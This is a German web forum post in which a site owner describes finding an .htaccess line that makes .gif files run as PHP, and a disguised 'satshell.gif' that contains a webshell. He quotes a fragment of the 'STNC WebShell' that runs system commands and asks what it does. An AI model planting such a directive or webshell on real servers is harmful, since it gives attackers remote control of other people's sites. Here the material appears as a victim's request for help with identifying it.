registrieren registriertes Mitglied


Anzeige

Anzeige

AddType application/x-httpd-php .gif

Hier könnt Ihr mit der Community über sonstige Themen diskutieren und lustige oder unterhaltsame Beiträge teilen.
Rolandooo
PostRank 1
PostRank 1
Beiträge: 9
Registriert: 14.12.2009, 12:04

Beitrag Rolandooo » 16.12.2021, 00:09 AddType application/x-httpd-php .gif

Hallo
obiges war im "root" Pfad zum htdocs/ Verzeichnis in einer .htaccess Datei geschrieben und im images Verzeichnis lag eine satshell.gif, die erst durch Öffnen mit einem Texteditor einen php Code freigab. Ich habe den Code und könnte den Posten. Wer oder was hat das in mein Rootverzeichnis gelegt ? Ich kann das leider nicht interpretieren. Es könnte Schadcode sein ? Ist das hier interessant oder soll ich den Beitrag wieder löschen. Was könnte der Code machen ?

Ein kleiner Teil des Scriptes beschreibt sowas ?

<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".cmd("id")."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td><tr><td colspan=2 $hsplit><center><form method=post>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
Danke
Roland

Anzeige von: